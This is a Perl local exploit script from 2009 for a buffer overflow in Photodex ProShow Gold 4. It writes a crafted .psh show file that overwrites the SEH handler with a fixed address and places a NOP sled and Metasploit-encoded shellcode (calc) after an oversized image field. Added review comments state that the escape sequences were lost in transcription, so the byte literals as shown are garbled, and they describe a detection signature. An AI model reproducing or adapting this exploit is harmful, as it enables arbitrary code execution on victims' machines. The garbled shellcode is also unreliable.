# Title : Photodex ProShow Gold 4 (.psh File) Universal BOF Exploit XP SP3 (SEH)
# Published : 2009-08-24
# Author : corelanc0d3r
# Previous Title : Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)
# Next Title : KSP 2006 FINAL ( .M3U) Universal Local Buffer Exploit (SEH)
#
# [+] Vulnerability : ProShow Gold 4 BOF
# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit coded on : August 20, 2009
# [*] Type : local
# [*] OS : Windows
# [*] Product : Photodex ProShow Gold
# [*] Versions affected : 4.0
# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
# [*] -------------------------------------------------------------------------
# [*] Method : SEH - Universal
# [*] Tested on : Windows XP SP3 En
# [*] Greetz&Tx to : Saumil/SK
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
# Flat script, no named subroutines. It assembles a ProShow (.psh) show file
# in memory and writes it to $sploitfile in the current directory. Nothing is
# read from the network or from @ARGV; the only side effect is the file write
# at the bottom.
#
# NOTE(review): this listing is not byte-faithful. The string escapes have lost
# their backslashes in transcription ("n" where a line terminator is clearly
# intended, "x90", "xeb", and the whole $shellcode literal), so the bytes this
# copy would actually emit differ from what the header comments describe. Do
# not derive file signatures or hashes from the literals as shown here.
#
# NOTE(review): no `use strict; use warnings;` — $FILE further down is an
# undeclared package global, and neither open() nor close() is checked.
print " [+] Preparing payloadn";
# Output file name. It is a literal, so the 2-arg open below cannot receive a
# mode prefix from outside; it also matches the fileName= field in the header.
my $sploitfile="proshowsploit.psh";
# Ordinary ProShow 4 show-file preamble: plain-text key=value lines.
# The final line (cell[0].images[0].image=...) is deliberately written without
# a line terminator, so the oversized data that follows is appended directly
# onto that field's value.
my $fileheader="Photodex(R) ProShow(TM) Show File Version=0n".
"proshowVersion=2549n".
"title=Untitled ProShow 1n".
"fileName=proshowsploit.pshn".
"description=''n".
"showAspect=1n".
"showSizeX=16n".
"showSizeY=9n".
"loop=1n".
"loopRestart=1n".
"displaySizeX=704n".
"displaySizeY=528n".
"videoSizeX=720n".
"videoSizeY=480n".
"videoFrameRate=29970n".
"videoBitRate=1120000n".
"videoMuxBitRate=1394400n".
"outputImageSizeX=1024n".
"outputImageSizeY=768n".
"outputQuality=80n".
"toolbarEnable=1n".
"allowQuit=1n".
"allowPlay=1n".
"allowTime=1n".
"allowRestart=1n".
"allowSave=1n".
"allowSaveAll=1n".
"allowPrint=1n".
"allowPrintAll=1n".
"allowCopy=1n".
"allowSaver=1n".
"allowCta=1n".
"ctaLabel=ProShow Infon".
"ctaURL=http://www.photodex.com/n".
"background=1n".
"bgOutlineColor=0n".
"bgSizeMode=1n".
"bgColorizeColor=8421504n".
"waterOpacity=128n".
"waterZoom=10000n".
"waterColorizeColor=8421504n".
"musicVolumeOffset=100n".
"defaultCellVolumeOffset=100n".
"defaultCellFadeIn=100n".
"defaultCellFadeOut=100n".
"defaultMusicVolumeOffset=50n".
"defaultMusicFadeIn=100n".
"defaultMusicFadeOut=100n".
"maxDispWidth=800n".
"maxDispHeight=600n".
"maxRender=1n".
"maxRenderWidth=800n".
"maxRenderHeight=600n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFFn".
"makeFileLocalFolder=c:/n".
"cells=2n".
"cell[0].imageEnable=1n".
"cell[0].nrOfImages=1n".
# No line terminator here: $junk is concatenated straight onto this value.
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
# SEH-overwrite layout as announced in the header ("Method : SEH"): fixed-size
# filler, then the 4-byte next-SEH slot, the 4-byte handler slot, a NOP sled
# and the payload. All offsets are hard-coded for the build named in the
# header; nothing is measured or derived at runtime.
my $junk = "A" x 6120;
# Next-SEH slot (4 bytes; escapes missing in this copy, see note at the top).
my $nseh = "xebx18x90x90";
# Handler slot: pack('V') emits 0x01a614ea as a little-endian 32-bit value.
# The page does not say which module this address lives in. Being a fixed
# constant, it is only valid for the exact load layout the author tested.
my $seh = pack('V',0x01a614ea);
# 30-byte NOP sled (escapes missing in this copy).
my $nop="x90" x 30;
# Metasploit windows/exec payload, shikata_ga_nai-encoded, per the generator
# banner below: its configured command is calc, i.e. a visible proof-of-concept
# rather than anything persistent.
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode="xdaxd1xd9x74x24xf4x2bxc9xb1x1exbdx78x41xbf" .
"x6fx58x83xe8xfcx31x68x14x03x68x6cxa3x4ax93" .
"x64x67xb5x6cx74xe3xf0x50xffx8fxffxd0xfex80" .
"x8bx6ex18xd4xd3x50x19x01xa2x1bx2dx5ex34xf2" .
"x7cxa0xaexa6xfaxe0xa5xb1xc3x2bx48xbfx01x40" .
"xa7x84xd1xb3x4cx8ex3cx30x13x54xbfxacxcax1f" .
"xb3x79x98x7fxd7x7cx75xf4xfbxf5x88xe0x8ax56" .
"xafxf2x4fx39x9ex0cx2fx90x84x7bxe9x2cxcex3c" .
"xf9xc7xa0xa0xacx53x28xd1x27x9bx2ax21x5dx0c" .
"x45x52x2bxa8xcaxfaxb3x4fx7exf4x94x50x98x6a" .
"x7bxc3x04x6d";
# Pads the payload region to exactly 2000 bytes. Perl detail worth knowing:
# if length($shellcode) ever exceeded 2000 the repeat count would go negative
# and `x` would return an empty string instead of failing, silently shifting
# the rest of the file layout.
my $junk2="D" x (2000-length($shellcode));
# Remainder of the show file. It begins with a line terminator (the leading
# "n" in this copy), which is what ends the oversized image= field; the rest
# is an ordinary two-cell show whose second cell references Abstract_01.jpg.
my $filefooter = "ncell[0].images[0].imageEnable=1n".
"cell[0].images[0].name=Abstract_02n".
"cell[0].images[0].replaceableTemplate=1n".
"cell[0].images[0].sizeMode=1n".
"cell[0].images[0].colorizeColor=8421504n".
"cell[0].images[0].colorizeStrength=10000n".
"cell[0].images[0].outlineColor=16777215n".
"cell[0].images[0].aspectX=4n".
"cell[0].images[0].aspectY=3n".
"cell[0].images[0].videoVolume=100n".
"cell[0].images[0].objectId=1n".
"cell[0].images[0].videoSpeed=100n".
"cell[0].images[0].nrOfKeyframes=2n".
"cell[0].images[0].keyframes[0].timeSegment=1n".
"cell[0].images[0].keyframes[0].attributeMask=-1n".
"cell[0].images[0].keyframes[0].zoomX=10000n".
"cell[0].images[0].keyframes[0].zoomY=10000n".
"cell[0].images[0].keyframes[0].panAccelType=1n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1n".
"cell[0].images[0].keyframes[0].rotationAccelType=1n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1n".
"cell[0].images[0].keyframes[0].lockAR=1n".
"cell[0].images[0].keyframes[0].transparency=0n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70n".
"cell[0].images[0].keyframes[1].timestamp=10000n".
"cell[0].images[0].keyframes[1].timeSegment=3n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[0].images[0].keyframes[1].attributeMask=-1n".
"cell[0].images[0].keyframes[1].zoomX=10000n".
"cell[0].images[0].keyframes[1].zoomY=10000n".
"cell[0].images[0].keyframes[1].panAccelType=1n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1n".
"cell[0].images[0].keyframes[1].rotationAccelType=1n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1n".
"cell[0].images[0].keyframes[1].lockAR=1n".
"cell[0].images[0].keyframes[1].transparency=0n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70n".
"cell[0].background=1n".
"cell[0].bgDefault=1n".
"cell[0].bgSizeMode=1n".
"cell[0].bgColorizeColor=8421504n".
"cell[0].sound.useDefault=1n".
"cell[0].sound.volume=100n".
"cell[0].sound.fadeIn=100n".
"cell[0].sound.fadeOut=100n".
"cell[0].sound.async=1n".
"cell[0].sound.musicUseDefault=1n".
"cell[0].sound.musicVolume=50n".
"cell[0].sound.musicFadeIn=100n".
"cell[0].sound.musicFadeOut=100n".
"cell[0].musicVolumeOffset=50n".
"cell[0].time=3000n".
"cell[0].transId=2n".
"cell[0].transTime=3000n".
"cell[0].includeGlobalCaptions=1n".
"cell[1].imageEnable=1n".
"cell[1].nrOfImages=1n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpgn".
"cell[1].images[0].imageEnable=1n".
"cell[1].images[0].name=Abstract_01n".
"cell[1].images[0].replaceableTemplate=1n".
"cell[1].images[0].sizeMode=1n".
"cell[1].images[0].colorizeColor=8421504n".
"cell[1].images[0].colorizeStrength=10000n".
"cell[1].images[0].outlineColor=16777215n".
"cell[1].images[0].aspectX=4n".
"cell[1].images[0].aspectY=3n".
"cell[1].images[0].videoVolume=100n".
"cell[1].images[0].objectId=2n".
"cell[1].images[0].videoSpeed=100n".
"cell[1].images[0].nrOfKeyframes=2n".
"cell[1].images[0].keyframes[0].timeSegment=1n".
"cell[1].images[0].keyframes[0].attributeMask=-1n".
"cell[1].images[0].keyframes[0].zoomX=10000n".
"cell[1].images[0].keyframes[0].zoomY=10000n".
"cell[1].images[0].keyframes[0].panAccelType=1n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1n".
"cell[1].images[0].keyframes[0].rotationAccelType=1n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1n".
"cell[1].images[0].keyframes[0].lockAR=1n".
"cell[1].images[0].keyframes[0].transparency=0n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70n".
"cell[1].images[0].keyframes[1].timestamp=10000n".
"cell[1].images[0].keyframes[1].timeSegment=3n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[1].images[0].keyframes[1].attributeMask=-1n".
"cell[1].images[0].keyframes[1].zoomX=10000n".
"cell[1].images[0].keyframes[1].zoomY=10000n".
"cell[1].images[0].keyframes[1].panAccelType=1n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1n".
"cell[1].images[0].keyframes[1].rotationAccelType=1n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1n".
"cell[1].images[0].keyframes[1].lockAR=1n".
"cell[1].images[0].keyframes[1].transparency=0n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70n".
"cell[1].background=1n".
"cell[1].bgDefault=1n".
"cell[1].bgSizeMode=1n".
"cell[1].bgColorizeColor=8421504n".
"cell[1].sound.useDefault=1n".
"cell[1].sound.volume=100n".
"cell[1].sound.fadeIn=100n".
"cell[1].sound.fadeOut=100n".
"cell[1].sound.async=1n".
"cell[1].sound.musicUseDefault=1n".
"cell[1].sound.musicVolume=50n".
"cell[1].sound.musicFadeIn=100n".
"cell[1].sound.musicFadeOut=100n".
"cell[1].musicVolumeOffset=50n".
"cell[1].time=3000n".
"cell[1].transId=2n".
"cell[1].transTime=3000n".
"cell[1].includeGlobalCaptions=1n".
"modifierCount=0n";
# Final file image: header, oversized field, footer. From a detection
# standpoint the distinguishing trait of the written file is a
# cell[0].images[0].image= value several kilobytes long (6120 filler bytes
# followed by a 2000-byte region containing non-printable bytes) inside an
# otherwise plain-text .psh.
my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
print " [+] Writing payload to filen";
# 2-arg open with the mode interpolated into the path, global handle, return
# value unchecked. The literal file name keeps it from being abused as a mode
# injection, but if the open fails the prints below go to an unopened handle
# and the script still reports success.
open($FILE,">$sploitfile");
print $FILE $payload;
# close() is where buffered write errors surface; its result is also ignored.
close($FILE);
print " [+] Exploit file " . $sploitfile . " createdn";
# Reports the length of the in-memory buffer, not the number of bytes that
# actually reached the file.
print " [+] Wrote " . length($payload) . " bytesn";